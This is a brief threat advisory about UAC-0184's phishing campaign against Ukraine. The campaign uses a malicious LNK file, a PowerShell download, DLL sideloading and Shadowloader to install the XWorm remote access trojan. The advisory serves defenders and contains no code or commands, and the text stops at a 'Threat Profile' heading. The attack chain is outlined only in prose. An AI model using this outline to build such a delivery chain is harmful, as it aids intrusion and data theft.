Professional Documents
Culture Documents
XWorm RAT Malware
XWorm RAT Malware
A malware campaign targeting Ukraine has been identified, orchestrated by the UAC-0184 threat
actor group. This campaign marks a continuation of their persistent efforts to infiltrate Ukrainian
entities, utilizing tactics to deploy the XWorm Remote Access Trojan (RAT). The attackers employ
deceptive lure documents and advanced malware delivery mechanisms, posing a significant threat to
targeted systems and data security.
The malware campaign begins with the distribution of a malicious LNK file hidden within phishing
emails. When executed, the LNK file triggers a PowerShell script that downloads a ZIP archive
containing legitimate and malicious Python components, including an encrypted payload. Through
techniques like DLL sideloading and Shadowloader, the final payload, XWorm RAT, is executed. This
malware is designed for remote access and exhibits capabilities such as data theft, DDoS attacks, and
facilitating additional malware downloads. Despite current analysis showing an inactive Command-
and-Control server, the potential for future malicious activities remains high.
UAC-0184's campaign underscores their persistent targeting of Ukrainian sectors, utilizing evolving
tactics to evade detection and maintain access to compromised systems. The deployment of XWorm
RAT highlights their intent to establish persistent remote access, posing ongoing security risks.
Organizations are urged to enhance their defenses against phishing attacks and remain vigilant against
such threats targeting critical infrastructure and sensitive data.
Threat Profile: